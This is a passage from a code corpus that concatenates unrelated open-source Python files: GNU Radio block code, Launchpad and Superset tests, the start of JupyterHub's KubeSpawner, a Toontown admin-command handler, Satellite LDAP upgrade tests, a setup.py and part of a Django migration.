inputs_data = []
outputs_data = []
def __init__(self, flow_graph, **kwargs):
super(EPyBlock, self).__init__(flow_graph, **kwargs)
self.states["_io_cache"] = ""
self._epy_source_hash = -1
self._epy_reload_error = None
def rewrite(self):
Element.rewrite(self)
param_src = self.params["_source_code"]
src = param_src.get_value()
src_hash = hash((self.name, src))
if src_hash == self._epy_source_hash:
return
try:
blk_io = utils.epy_block_io.extract(src)
except Exception as e:
self._epy_reload_error = ValueError(str(e))
try: # Load last working block io
blk_io_args = literal_eval(self.states["_io_cache"])
if len(blk_io_args) == 6:
blk_io_args += ([],) # add empty callbacks
blk_io = utils.epy_block_io.BlockIO(*blk_io_args)
except Exception:
return
else:
self._epy_reload_error = None # Clear previous errors
self.states["_io_cache"] = repr(tuple(blk_io))
# print "Rewriting embedded python block {!r}".format(self.name)
self._epy_source_hash = src_hash
self.label = blk_io.name or blk_io.cls
self.documentation = {"": blk_io.doc}
self.templates["imports"] = "import " + self.name
self.templates["make"] = "{mod}.{cls}({args})".format(
mod=self.name,
cls=blk_io.cls,
args=", ".join("{0}=${{ {0} }}".format(key) for key, _ in blk_io.params),
)
self.templates["callbacks"] = [
"{0} = ${{ {0} }}".format(attr) for attr in blk_io.callbacks
]
self._update_params(blk_io.params)
self._update_ports("in", self.sinks, blk_io.sinks, "sink")
self._update_ports("out", self.sources, blk_io.sources, "source")
super(EPyBlock, self).rewrite()
def _update_params(self, params_in_src):
param_factory = self.parent_platform.make_param
params = {}
for key, value in self.params.copy().items():
if hasattr(value, "__epy_param__"):
params[key] = value
del self.params[key]
for id_, value in params_in_src:
try:
param = params[id_]
if param.default == param.value:
param.set_value(value)
param.default = str(value)
except KeyError: # need to make a new param
param = param_factory(
parent=self,
id=id_,
dtype="raw",
value=value,
name=id_.replace("_", " ").title(),
)
setattr(param, "__epy_param__", True)
self.params[id_] = param
def _update_ports(self, label, ports, port_specs, direction):
port_factory = self.parent_platform.make_port
ports_to_remove = list(ports)
iter_ports = iter(ports)
ports_new = []
port_current = next(iter_ports, None)
for key, port_type, vlen in port_specs:
reuse_port = (
port_current is not None
and port_current.dtype == port_type
and port_current.vlen == vlen
and (key.isdigit() or port_current.key == key)
)
if reuse_port:
ports_to_remove.remove(port_current)
port, port_current = port_current, next(iter_ports, None)
else:
n = dict(name=label + str(key), dtype=port_type, id=key)
if port_type == "message":
n["name"] = key
n["optional"] = "1"
if vlen > 1:
n["vlen"] = str(vlen)
port = port_factory(self, direction=direction, **n)
ports_new.append(port)
# replace old port list with new one
del ports[:]
ports.extend(ports_new)
# remove excess port connections
self.parent_flowgraph.disconnect(*ports_to_remove)
def validate(self):
super(EPyBlock, self).validate()
if self._epy_reload_error:
self.params["_source_code"].add_error_message(str(self._epy_reload_error))
@register_build_in
class EPyModule(Block):
    """Built-in block that embeds a user-editable Python module whose names
    become accessible from other blocks via this block's ID."""
    key = "epy_module"
    label = "Python Module"
    documentation = {
        "": dedent(
            """
            This block lets you embed a python module in your flowgraph.

            Code you put in this module is accessible in other blocks using the ID of this
            block. Example:

            If you put

                a = 2

                def double(arg):
                    return 2 * arg

            in a Python Module Block with the ID 'stuff' you can use code like

                stuff.a # evals to 2
                stuff.double(3) # evals to 6

            to set parameters of other blocks in your flowgraph.
            """
        )
    }
    # NOTE(review): this binds the shared Block.flags object and then calls
    # .set() on it — presumably Flags.set is safe to apply repeatedly, but
    # verify it does not mutate flags for all Block subclasses.
    epy_flags = Block.flags
    epy_flags.set(epy_flags.SHOW_ID)
    parameters_data = build_params(
        params_raw=[
            dict(
                label="Code",
                id="source_code",
                dtype="_multiline_python_external",
                default="# this module will be imported in the into your flowgraph",
                hide="part",
            )
        ],
        have_inputs=False,
        have_outputs=False,
        flags=epy_flags,
        block_id=key,
    )
    templates = MakoTemplates(imports="import ${ id }  # embedded python module",)
|
abramhindle/UnnaturalCodeFork | python/testdata/launchpad/lib/lp/registry/tests/test_oopsreferences.py | Python | agpl-3.0 | 7,128 | 0.001263 | # Copyright 2009-2011 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
"""Tests of the oopsreferences core."""
__metaclass__ = type
from datetime import (
datetime,
timedelta,
)
from pytz import utc
from lp.registry.model.oopsreferences import referenced_oops
from lp.services.database.interfaces import IStore
from lp.services.messages.model.message import (
Message,
MessageSet,
)
from lp.testing import (
person_logged_in,
TestCaseWithFactory,
)
from lp.testing.layers import DatabaseFunctionalLayer
class TestOopsReferences(TestCaseWithFactory):
    """Exercise referenced_oops() extraction of OOPS ids from messages,
    bugs and questions.

    Each test creates an artifact mentioning an OOPS id, then checks the
    id is reported for a time window covering the artifact and not for a
    window after it.  Uses assertEqual rather than the deprecated
    failUnlessEqual alias.
    """

    layer = DatabaseFunctionalLayer

    def setUp(self):
        super(TestOopsReferences, self).setUp()
        self.store = IStore(Message)

    def test_oops_in_messagechunk(self):
        oopsid = "OOPS-abcdef1234"
        MessageSet().fromText('foo', "foo %s bar" % oopsid)
        self.store.flush()
        now = datetime.now(tz=utc)
        day = timedelta(days=1)
        self.assertEqual(
            set([oopsid]),
            referenced_oops(now - day, now, "product=1", {}))
        self.assertEqual(
            set(),
            referenced_oops(now + day, now + day, "product=1", {}))

    def test_oops_in_messagesubject(self):
        oopsid = "OOPS-abcdef1234"
        self.factory.makeEmailMessage()
        MessageSet().fromText("Crash with %s" % oopsid, "body")
        self.store.flush()
        now = datetime.now(tz=utc)
        day = timedelta(days=1)
        self.assertEqual(
            set([oopsid]),
            referenced_oops(now - day, now, "product=1", {}))
        self.assertEqual(
            set(),
            referenced_oops(now + day, now + day, "product=1", {}))

    def test_oops_in_bug_title(self):
        oopsid = "OOPS-abcdef1234"
        bug = self.factory.makeBug()
        with person_logged_in(bug.owner):
            bug.title = "Crash with %s" % oopsid
        self.store.flush()
        now = datetime.now(tz=utc)
        day = timedelta(days=1)
        self.assertEqual(
            set([oopsid]),
            referenced_oops(now - day, now, "product=1", {}))
        self.assertEqual(
            set(),
            referenced_oops(now + day, now + day, "product=1", {}))

    def test_oops_in_bug_description(self):
        oopsid = "OOPS-abcdef1234"
        bug = self.factory.makeBug()
        with person_logged_in(bug.owner):
            bug.description = "Crash with %s" % oopsid
        self.store.flush()
        now = datetime.now(tz=utc)
        day = timedelta(days=1)
        self.assertEqual(
            set([oopsid]),
            referenced_oops(now - day, now, "product=1", {}))
        self.assertEqual(
            set(),
            referenced_oops(now + day, now + day, "product=1", {}))

    def test_oops_in_question_title(self):
        oopsid = "OOPS-abcdef1234"
        question = self.factory.makeQuestion(title="Crash with %s" % oopsid)
        self.store.flush()
        now = datetime.now(tz=utc)
        day = timedelta(days=1)
        self.assertEqual(
            set([oopsid]),
            referenced_oops(now - day, now, "product=%(product)s",
                {'product': question.product.id}))
        self.assertEqual(
            set([]),
            referenced_oops(now + day, now + day, "product=%(product)s",
                {'product': question.product.id}))

    def test_oops_in_question_wrong_context(self):
        # An OOPS in a question for one product must not be reported
        # when querying a different product context.
        oopsid = "OOPS-abcdef1234"
        question = self.factory.makeQuestion(title="Crash with %s" % oopsid)
        self.store.flush()
        now = datetime.now(tz=utc)
        day = timedelta(days=1)
        self.store.flush()
        self.assertEqual(
            set(),
            referenced_oops(now - day, now, "product=%(product)s",
                {'product': question.product.id + 1}))

    def test_oops_in_question_description(self):
        oopsid = "OOPS-abcdef1234"
        question = self.factory.makeQuestion(
            description="Crash with %s" % oopsid)
        self.store.flush()
        now = datetime.now(tz=utc)
        day = timedelta(days=1)
        self.assertEqual(
            set([oopsid]),
            referenced_oops(now - day, now, "product=%(product)s",
                {'product': question.product.id}))
        self.assertEqual(
            set([]),
            referenced_oops(now + day, now + day, "product=%(product)s",
                {'product': question.product.id}))

    def test_oops_in_question_whiteboard(self):
        oopsid = "OOPS-abcdef1234"
        question = self.factory.makeQuestion()
        with person_logged_in(question.owner):
            question.whiteboard = "Crash with %s" % oopsid
            self.store.flush()
        now = datetime.now(tz=utc)
        day = timedelta(days=1)
        self.assertEqual(
            set([oopsid]),
            referenced_oops(now - day, now, "product=%(product)s",
                {'product': question.product.id}))
        self.assertEqual(
            set([]),
            referenced_oops(now + day, now + day, "product=%(product)s",
                {'product': question.product.id}))

    def test_oops_in_question_distribution(self):
        oopsid = "OOPS-abcdef1234"
        distro = self.factory.makeDistribution()
        question = self.factory.makeQuestion(target=distro)
        with person_logged_in(question.owner):
            question.whiteboard = "Crash with %s" % oopsid
            self.store.flush()
        now = datetime.now(tz=utc)
        day = timedelta(days=1)
        self.assertEqual(
            set([oopsid]),
            referenced_oops(now - day, now, "distribution=%(distribution)s",
                {'distribution': distro.id}))
        self.assertEqual(
            set([]),
            referenced_oops(now + day, now + day,
                "distribution=%(distribution)s", {'distribution': distro.id}))

    def test_referenced_oops_in_urls_bug_663249(self):
        # Sometimes OOPS ids appears as part of an URL. These should could as
        # a reference even though they are not formatted specially - this
        # requires somewhat special handling in the reference calculation
        # function.
        oopsid_old = "OOPS-abcdef1234"
        oopsid_new = "OOPS-4321"
        bug_old = self.factory.makeBug()
        bug_new = self.factory.makeBug()
        with person_logged_in(bug_old.owner):
            bug_old.description = (
                "foo https://lp-oops.canonical.com/oops.py?oopsid=%s bar"
                % oopsid_old)
        with person_logged_in(bug_new.owner):
            bug_new.description = (
                "foo https://oops.canonical.com/oops.py?oopsid=%s bar"
                % oopsid_new)
        self.store.flush()
        now = datetime.now(tz=utc)
        day = timedelta(days=1)
        self.assertEqual(
            set([oopsid_old, oopsid_new]),
            referenced_oops(now - day, now, "product=1", {}))
        self.assertEqual(
            set([]),
            referenced_oops(now + day, now + day, "product=1", {}))
|
jupyterhub/kubespawner | kubespawner/spawner.py | Python | bsd-3-clause | 109,371 | 0.002076 | """
JupyterHub Spawner to spawn user notebooks on a Kubernetes cluster.
This module exports `KubeSpawner` class, which is the actual spawner
implementation that should be used by JupyterHub.
"""
import asyncio
import os
import signal
import string
import sys
import warnings
from functools import partial
from functools import wraps
from urllib.parse import urlparse
import escapism
from jinja2 import BaseLoader
from jinja2 import Environment
from jupyterhub.spawner import Spawner
from jupyterhub.traitlets import Command
from jupyterhub.utils import exponential_backoff
from kubernetes_asyncio import client
from kubernetes_asyncio.client.rest import ApiException
from slugify import slugify
from tornado import gen
from traitlets import Bool
from traitlets import default
from traitlets import Dict
from traitlets import Integer
from traitlets import List
from traitlets import observe
from traitlets import Unicode
from traitlets import Union
from traitlets import validate
from .clients import load_config
from .clients import shared_client
from .objects import make_namespace
from .objects import make_owner_reference
from .objects import make_pod
from .objects import make_pvc
from .objects import make_secret
from .objects import make_service
from .reflector import ResourceReflector
from .traitlets import Callable
class PodReflector(ResourceReflector):
    """
    PodReflector is merely a configured ResourceReflector. It exposes
    the pods property, which is simply mapping to self.resources where the
    ResourceReflector keeps an updated list of the resource defined by
    the `kind` field and the `list_method_name` field.
    """

    kind = "pods"
    # The default component label can be over-ridden by specifying the component_label property
    labels = {
        'component': 'singleuser-server',
    }

    @property
    def pods(self):
        """
        A dictionary of pods for the namespace as returned by the Kubernetes
        API. The dictionary keys are the pod ids and the values are
        dictionaries of the actual pod resource values.

        ref: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#pod-v1-core
        """
        # `resources` is maintained live by the base ResourceReflector.
        return self.resources
class EventReflector(ResourceReflector):
    """
    EventsReflector is merely a configured ResourceReflector. It
    exposes the events property, which is simply mapping to self.resources where
    the ResourceReflector keeps an updated list of the resource
    defined by the `kind` field and the `list_method_name` field.
    """

    kind = "events"

    @property
    def events(self):
        """
        Returns list of dictionaries representing the k8s
        events within the namespace, sorted by the latest event.

        ref: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#event-v1-core
        """
        # NOTE:
        # - self.resources is a dictionary with keys mapping unique ids of
        #   Kubernetes Event resources, updated by ResourceReflector.
        #   self.resources will builds up with incoming k8s events, but can also
        #   suddenly refreshes itself entirely. We should not assume a call to
        #   this dictionary's values will result in a consistently ordered list,
        #   so we sort it to get it somewhat more structured.
        # - We either seem to get only event['lastTimestamp'] or
        #   event['eventTime'], both fields serve the same role but the former
        #   is a low resolution timestamp without and the other is a higher
        #   resolution timestamp.
        return sorted(
            self.resources.values(),
            key=lambda event: event["lastTimestamp"] or event["eventTime"],
        )
class MockObject(object):
    """Bare attribute container used to stub ``user``/``hub`` objects when
    KubeSpawner is instantiated with ``_mock=True`` (test execution only)."""
    pass
class KubeSpawner(Spawner):
"""
A JupyterHub spawner that spawn pods in a Kubernetes Cluster. Each server
spawned by a user will have its own KubeSpawner instance.
"""
reflectors = {
"pods": None,
"events": None,
}
# Characters as defined by safe for DNS
# Note: '-' is not in safe_chars, as it is being used as escape character
safe_chars = set(string.ascii_lowercase + string.digits)
    @property
    def pod_reflector(self):
        """
        A convenience alias to the class variable reflectors['pods'].

        Shared across all spawner instances of this class.
        """
        return self.__class__.reflectors['pods']
    @property
    def event_reflector(self):
        """
        A convenience alias to the class variable reflectors['events'] if the
        spawner instance has events_enabled.

        Implicitly returns None when events are disabled.
        """
        if self.events_enabled:
            return self.__class__.reflectors['events']
    def __init__(self, *args, **kwargs):
        """Initialize the spawner: compute per-user resource names from the
        configured templates, load the Kubernetes client config, and start
        the shared pod/event watchers.

        ``_mock=True`` (tests only) stubs out ``user`` and ``hub``.
        """
        _mock = kwargs.pop('_mock', False)
        super().__init__(*args, **kwargs)
        if _mock:
            # runs during test execution only
            if 'user' not in kwargs:
                user = MockObject()
                user.name = 'mock_name'
                user.id = 'mock_id'
                user.url = 'mock_url'
                self.user = user
            if 'hub' not in kwargs:
                hub = MockObject()
                hub.public_host = 'mock_public_host'
                hub.url = 'mock_url'
                hub.base_url = 'mock_base_url'
                hub.api_url = 'mock_api_url'
                self.hub = hub

        # We have to set the namespace (if user namespaces are enabled)
        # before we start the reflectors, so this must run before
        # watcher start in normal execution. We still want to get the
        # namespace right for test, though, so we need self.user to have
        # been set in order to do that.

        # By now, all the traitlets have been set, so we can use them to
        # compute other attributes
        if self.enable_user_namespaces:
            self.namespace = self._expand_user_properties(self.user_namespace_template)
            self.log.info("Using user namespace: {}".format(self.namespace))

        self.pod_name = self._expand_user_properties(self.pod_name_template)
        self.dns_name = self.dns_name_template.format(
            namespace=self.namespace, name=self.pod_name
        )
        self.secret_name = self._expand_user_properties(self.secret_name_template)
        self.pvc_name = self._expand_user_properties(self.pvc_name_template)
        if self.working_dir:
            self.working_dir = self._expand_user_properties(self.working_dir)
        if self.port == 0:
            # Our default port is 8888
            self.port = 8888

        # The attribute needs to exist, even though it is unset to start with
        self._start_future = None

        load_config(host=self.k8s_api_host, ssl_ca_cert=self.k8s_api_ssl_ca_cert)
        self.api = shared_client("CoreV1Api")
        self._start_watching_pods()
        if self.events_enabled:
            self._start_watching_events()
    # Decorator defined in the class body: takes the undecorated method as
    # its sole argument (no `self`).
    def _await_pod_reflector(method):
        """Decorator to wait for pod reflector to load

        Apply to methods which require the pod reflector
        to have completed its first load of pods.
        """

        @wraps(method)
        async def async_method(self, *args, **kwargs):
            if not self.pod_reflector.first_load_future.done():
                await self.pod_reflector.first_load_future
            return await method(self, *args, **kwargs)

        return async_method
    # Decorator defined in the class body: takes the undecorated method as
    # its sole argument (no `self`).
    def _await_event_reflector(method):
        """Decorator to wait for event reflector to load

        Apply to methods which require the event reflector
        to have completed its first load of events.

        No-op when events are disabled.
        """

        @wraps(method)
        async def async_method(self, *args, **kwargs):
            if (
                self.events_enabled
                and not self.event_reflector.first_load_future.done()
            ):
                await self.event_reflector.first_load_future
            return await method(self, *args, **kwargs)

        return async_method
k8s_api_ssl_ca_cert = Unicode(
"",
config=True,
help="""
Location (absolute filepath) for CA certs of the k8s API server.
Typically |
ToonTownInfiniteRepo/ToontownInfinite | otp/ai/MagicWordManagerAI.py | Python | mit | 1,950 | 0.004615 | from direct.directnotify import DirectNotifyGlobal
from direct.distributed.DistributedObjectAI import DistributedObjectAI
from otp.ai.MagicWordGlobal import *
from direct.distributed.PyDatagram import PyDatagram
from direct.distributed.MsgTypes import *
class MagicWordManagerAI(DistributedObjectAI):
    """AI-side manager that validates and dispatches "magic word" admin
    commands received from clients."""

    notify = DirectNotifyGlobal.directNotify.newCategory("MagicWordManagerAI")

    def sendMagicWord(self, word, targetId):
        """Handle a magic word sent by a client.

        Validates that the target is a toon, that the invoker exists and
        has sufficient admin access, then runs the word through the
        spellbook and reports the result back to the invoker.  Non-admin
        attempts are logged and the offending client is ejected.

        :param word: the magic word string to execute.
        :param targetId: doId of the avatar the word should apply to.
        """
        invokerId = self.air.getAvatarIdFromSender()
        invoker = self.air.doId2do.get(invokerId)
        # NOTE(review): identifying the target type via str() of the object
        # is fragile; kept for behavioral compatibility — consider isinstance.
        if 'DistributedToonAI' not in str(self.air.doId2do.get(targetId)):
            self.sendUpdateToAvatarId(invokerId, 'sendMagicWordResponse', ['Target is not a toon object!'])
            return
        if not invoker:
            self.sendUpdateToAvatarId(invokerId, 'sendMagicWordResponse', ['missing invoker'])
            return
        if invoker.getAdminAccess() < MINIMUM_MAGICWORD_ACCESS:
            # Log the attempt and forcibly disconnect the non-admin client.
            self.air.writeServerEvent('suspicious', invokerId, 'Attempted to issue magic word: %s' % word)
            dg = PyDatagram()
            dg.addServerHeader(self.GetPuppetConnectionChannel(invokerId), self.air.ourChannel, CLIENTAGENT_EJECT)
            dg.addUint16(126)
            dg.addString('Magic Words are reserved for administrators only!')
            self.air.send(dg)
            return
        target = self.air.doId2do.get(targetId)
        if not target:
            self.sendUpdateToAvatarId(invokerId, 'sendMagicWordResponse', ['missing target'])
            return
        response = spellbook.process(invoker, target, word)
        if response:
            self.sendUpdateToAvatarId(invokerId, 'sendMagicWordResponse', [response])
        self.air.writeServerEvent('magic-word',
                                  invokerId, invoker.getAdminAccess(),
                                  targetId, target.getAdminAccess(),
                                  word, response)
|
alanmcruickshank/superset-dev | tests/security_tests.py | Python | apache-2.0 | 7,916 | 0.000126 | from superset import security, sm
from .base_tests import SupersetTestCase
def get_perm_tuples(role_name):
    """Return the set of (permission name, view-menu name) pairs held by
    the named role."""
    role = sm.find_role(role_name)
    return {
        (p.permission.name, p.view_menu.name)
        for p in role.permissions
    }
class RolePermissionTests(SupersetTestCase):
    """Check that the builtin roles (Gamma, Alpha, Admin, sql_lab, granter)
    carry exactly the expected permission/view-menu pairs.

    (The original docstring was copy-pasted from the dashboard
    export/import tests; the redundant pass-through __init__ was removed.)
    """

    # --- assertion helpers over a set of (permission, view_menu) tuples ---

    def assert_can_read(self, view_menu, permissions_set):
        """Assert read-style permissions on a view menu."""
        self.assertIn(('can_show', view_menu), permissions_set)
        self.assertIn(('can_list', view_menu), permissions_set)

    def assert_can_write(self, view_menu, permissions_set):
        """Assert write-style permissions on a view menu."""
        self.assertIn(('can_add', view_menu), permissions_set)
        self.assertIn(('can_download', view_menu), permissions_set)
        self.assertIn(('can_delete', view_menu), permissions_set)
        self.assertIn(('can_edit', view_menu), permissions_set)

    def assert_cannot_write(self, view_menu, permissions_set):
        """Assert absence of write-style permissions on a view menu."""
        self.assertNotIn(('can_add', view_menu), permissions_set)
        self.assertNotIn(('can_download', view_menu), permissions_set)
        self.assertNotIn(('can_delete', view_menu), permissions_set)
        self.assertNotIn(('can_edit', view_menu), permissions_set)
        self.assertNotIn(('can_save', view_menu), permissions_set)

    def assert_can_all(self, view_menu, permissions_set):
        """Assert both read and write permissions on a view menu."""
        self.assert_can_read(view_menu, permissions_set)
        self.assert_can_write(view_menu, permissions_set)

    def assert_cannot_gamma(self, perm_set):
        self.assert_cannot_write('DruidColumnInlineView', perm_set)

    def assert_can_gamma(self, perm_set):
        self.assert_can_read('DatabaseAsync', perm_set)
        self.assert_can_read('TableModelView', perm_set)

        # make sure that user can create slices and dashboards
        self.assert_can_all('SliceModelView', perm_set)
        self.assert_can_all('DashboardModelView', perm_set)

        self.assertIn(('can_add_slices', 'Superset'), perm_set)
        self.assertIn(('can_copy_dash', 'Superset'), perm_set)
        self.assertIn(('can_activity_per_day', 'Superset'), perm_set)
        self.assertIn(('can_created_dashboards', 'Superset'), perm_set)
        self.assertIn(('can_created_slices', 'Superset'), perm_set)
        self.assertIn(('can_csv', 'Superset'), perm_set)
        self.assertIn(('can_dashboard', 'Superset'), perm_set)
        self.assertIn(('can_explore', 'Superset'), perm_set)
        self.assertIn(('can_explore_json', 'Superset'), perm_set)
        self.assertIn(('can_fave_dashboards', 'Superset'), perm_set)
        self.assertIn(('can_fave_slices', 'Superset'), perm_set)
        self.assertIn(('can_save_dash', 'Superset'), perm_set)
        self.assertIn(('can_slice', 'Superset'), perm_set)
        self.assertIn(('can_explore', 'Superset'), perm_set)
        self.assertIn(('can_explore_json', 'Superset'), perm_set)

    def assert_can_alpha(self, perm_set):
        self.assert_can_all('SqlMetricInlineView', perm_set)
        self.assert_can_all('TableColumnInlineView', perm_set)
        self.assert_can_all('TableModelView', perm_set)
        self.assert_can_all('DruidColumnInlineView', perm_set)
        self.assert_can_all('DruidDatasourceModelView', perm_set)
        self.assert_can_all('DruidMetricInlineView', perm_set)

        self.assertIn(
            ('all_datasource_access', 'all_datasource_access'), perm_set)
        self.assertIn(('muldelete', 'DruidDatasourceModelView'), perm_set)

    def assert_cannot_alpha(self, perm_set):
        self.assert_cannot_write('AccessRequestsModelView', perm_set)
        self.assert_cannot_write('Queries', perm_set)
        self.assert_cannot_write('RoleModelView', perm_set)
        self.assert_cannot_write('UserDBModelView', perm_set)

    def assert_can_admin(self, perm_set):
        self.assert_can_all('DatabaseAsync', perm_set)
        self.assert_can_all('DatabaseView', perm_set)
        self.assert_can_all('DruidClusterModelView', perm_set)
        self.assert_can_all('AccessRequestsModelView', perm_set)
        self.assert_can_all('RoleModelView', perm_set)
        self.assert_can_all('UserDBModelView', perm_set)

        self.assertIn(('all_database_access', 'all_database_access'), perm_set)
        self.assertIn(('can_override_role_permissions', 'Superset'), perm_set)
        self.assertIn(('can_sync_druid_source', 'Superset'), perm_set)
        self.assertIn(('can_override_role_permissions', 'Superset'), perm_set)
        self.assertIn(('can_approve', 'Superset'), perm_set)
        self.assertIn(('can_update_role', 'Superset'), perm_set)

    # --- tests proper ---

    def test_is_admin_only(self):
        self.assertFalse(security.is_admin_only(
            sm.find_permission_view_menu('can_show', 'TableModelView')))
        self.assertFalse(security.is_admin_only(
            sm.find_permission_view_menu(
                'all_datasource_access', 'all_datasource_access')))

        self.assertTrue(security.is_admin_only(
            sm.find_permission_view_menu('can_delete', 'DatabaseView')))
        self.assertTrue(security.is_admin_only(
            sm.find_permission_view_menu(
                'can_show', 'AccessRequestsModelView')))
        self.assertTrue(security.is_admin_only(
            sm.find_permission_view_menu(
                'can_edit', 'UserDBModelView')))
        self.assertTrue(security.is_admin_only(
            sm.find_permission_view_menu(
                'can_approve', 'Superset')))
        self.assertTrue(security.is_admin_only(
            sm.find_permission_view_menu(
                'all_database_access', 'all_database_access')))

    def test_is_alpha_only(self):
        self.assertFalse(security.is_alpha_only(
            sm.find_permission_view_menu('can_show', 'TableModelView')))

        self.assertTrue(security.is_alpha_only(
            sm.find_permission_view_menu('muldelete', 'TableModelView')))
        self.assertTrue(security.is_alpha_only(
            sm.find_permission_view_menu(
                'all_datasource_access', 'all_datasource_access')))
        self.assertTrue(security.is_alpha_only(
            sm.find_permission_view_menu('can_edit', 'SqlMetricInlineView')))
        self.assertTrue(security.is_alpha_only(
            sm.find_permission_view_menu(
                'can_delete', 'DruidMetricInlineView')))

    def test_is_gamma_pvm(self):
        self.assertTrue(security.is_gamma_pvm(
            sm.find_permission_view_menu('can_show', 'TableModelView')))

    def test_gamma_permissions(self):
        self.assert_can_gamma(get_perm_tuples('Gamma'))
        self.assert_cannot_gamma(get_perm_tuples('Gamma'))
        # NOTE(review): this checks the Alpha role inside the Gamma test;
        # presumably intentional, but verify it shouldn't be 'Gamma'.
        self.assert_cannot_alpha(get_perm_tuples('Alpha'))

    def test_alpha_permissions(self):
        self.assert_can_gamma(get_perm_tuples('Alpha'))
        self.assert_can_alpha(get_perm_tuples('Alpha'))
        self.assert_cannot_alpha(get_perm_tuples('Alpha'))

    def test_admin_permissions(self):
        self.assert_can_gamma(get_perm_tuples('Admin'))
        self.assert_can_alpha(get_perm_tuples('Admin'))
        self.assert_can_admin(get_perm_tuples('Admin'))

    def test_sql_lab_permissions(self):
        sql_lab_set = get_perm_tuples('sql_lab')
        self.assertIn(('can_sql_json', 'Superset'), sql_lab_set)
        self.assertIn(('can_csv', 'Superset'), sql_lab_set)
        self.assertIn(('can_search_queries', 'Superset'), sql_lab_set)

        self.assert_cannot_gamma(sql_lab_set)
        self.assert_cannot_alpha(sql_lab_set)

    def test_granter_permissions(self):
        granter_set = get_perm_tuples('granter')
        self.assertIn(('can_override_role_permissions', 'Superset'), granter_set)
        self.assertIn(('can_approve', 'Superset'), granter_set)

        self.assert_cannot_gamma(granter_set)
        self.assert_cannot_alpha(granter_set)
|
SatelliteQE/robottelo | tests/upgrades/test_usergroup.py | Python | gpl-3.0 | 3,681 | 0.002173 | """Test for User Group related Upgrade Scenario's
:Requirement: UpgradedSatellite
:CaseAutomation: Automated
:CaseLevel: Acceptance
:CaseComponent: UsersRoles
:Assignee: sganar
:TestType: Functional
:CaseImportance: High
:Upstream: No
"""
import pytest
from nailgun import entities
from nailgun.config import ServerConfig
from requests.exceptions import HTTPError
from robottelo.config import settings
from robottelo.constants import LDAP_ATTR
from robottelo.constants import LDAP_SERVER_TYPE
class TestUserGroupMembership:
    """
    Usergroup membership should exist after upgrade.
    """

    @pytest.mark.pre_upgrade
    def test_pre_create_usergroup_with_ldap_user(self, request, default_sat):
        """Create Usergroup in preupgrade version.

        :id: preupgrade-4b11d883-f523-4f38-b65a-650ecd90335c

        :steps:
            1. Create ldap auth pre upgrade.
            2. Login with ldap User in satellite and logout.
            3. Create usergroup and assign ldap user to it.

        :expectedresults: The usergroup, with ldap user as member, should be created successfully.
        """
        authsource = default_sat.api.AuthSourceLDAP(
            onthefly_register=True,
            account=settings.ldap.username,
            account_password=settings.ldap.password,
            base_dn=settings.ldap.basedn,
            groups_base=settings.ldap.grpbasedn,
            attr_firstname=LDAP_ATTR['firstname'],
            attr_lastname=LDAP_ATTR['surname'],
            attr_login=LDAP_ATTR['login_ad'],
            server_type=LDAP_SERVER_TYPE['API']['ad'],
            attr_mail=LDAP_ATTR['mail'],
            name=request.node.name + "_server",
            host=settings.ldap.hostname,
            tls=False,
            port='389',
        ).create()
        assert authsource.name == request.node.name + "_server"
        # Authenticate against the API as the LDAP user; the search is
        # expected to fail (HTTPError) but triggers on-the-fly registration
        # of the user.
        sc = ServerConfig(
            auth=(settings.ldap.username, settings.ldap.password),
            url=default_sat.url,
            verify=False,
        )
        with pytest.raises(HTTPError):
            entities.User(sc).search()
        user_group = default_sat.api.UserGroup(name=request.node.name + "_user_group").create()
        user = default_sat.api.User().search(query={'search': f'login={settings.ldap.username}'})[0]
        user_group.user = [user]
        user_group = user_group.update(['user'])
        assert user.login == user_group.user[0].read().login

    @pytest.mark.post_upgrade(depend_on=test_pre_create_usergroup_with_ldap_user)
    def test_post_verify_usergroup_membership(self, request, dependent_scenario_name):
        """After upgrade, check the LDAP user created before the upgrade still exists and its
        update functionality should work.

        :id: postupgrade-7545fc6a-bd57-4403-90c8-c68a7a3b5bca

        :steps:
            1. verify ldap user(created before upgrade) is part of user group.
            2. Update ldap auth.

        :expectedresults: After upgrade, user group membership should remain the same and LDAP
            auth update should work.
        """
        pre_test_name = dependent_scenario_name
        user_group = entities.UserGroup().search(
            query={'search': f'name={pre_test_name}_user_group'}
        )
        authsource = entities.AuthSourceLDAP().search(
            query={'search': f'name={pre_test_name}_server'}
        )[0]
        # Finalizers run in reverse registration order: user, then group,
        # then the auth source.
        request.addfinalizer(authsource.delete)
        request.addfinalizer(user_group[0].delete)
        user = entities.User().search(query={'search': f'login={settings.ldap.username}'})[0]
        request.addfinalizer(user.delete)
        assert user.read().id == user_group[0].read().user[0].id
|
oinopion/hurl | setup.py | Python | bsd-3-clause | 827 | 0 | from distutils.core import setup
from os import path
ROOT = path.dirname(__file__)
README = path.join(ROOT, 'README.rst')
setup(
name='hurl',
py_modules=['hurl'],
url=' | https://github.com/oinopion/hurl',
author='Tomek Paczkowski & Aleksandra Sendecka',
author_email='tomek@hauru.eu',
version='2.1',
license='New BSD License',
long_description=open(README).read(),
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
| 'Operating System :: OS Independent',
'Framework :: Django',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
)
|
chrisfilo/NeuroVault | neurovault/apps/statmaps/migrations/0027_auto_20150220_0305.py | Python | mit | 1,314 | 0.001522 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Add StatisticMap.cognitive_paradigm_cogatlas and update the
    modality field's choices/help text."""

    dependencies = [
        ('statmaps', '0026_populate_cogatlas'),
    ]

    operations = [
        migrations.AddField(
            model_name='statisticmap',
            name='cognitive_paradigm_cogatlas',
            field=models.CharField(help_text=b"Task (or lack of it) performed by the subjects in the scanner described using <a href='http://www.cognitiveatlas.org/'>Cognitive Atlas</a> terms", max_length=200, null=True, verbose_name=b'Cognitive Paradigm'),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='statisticmap',
            name='modality',
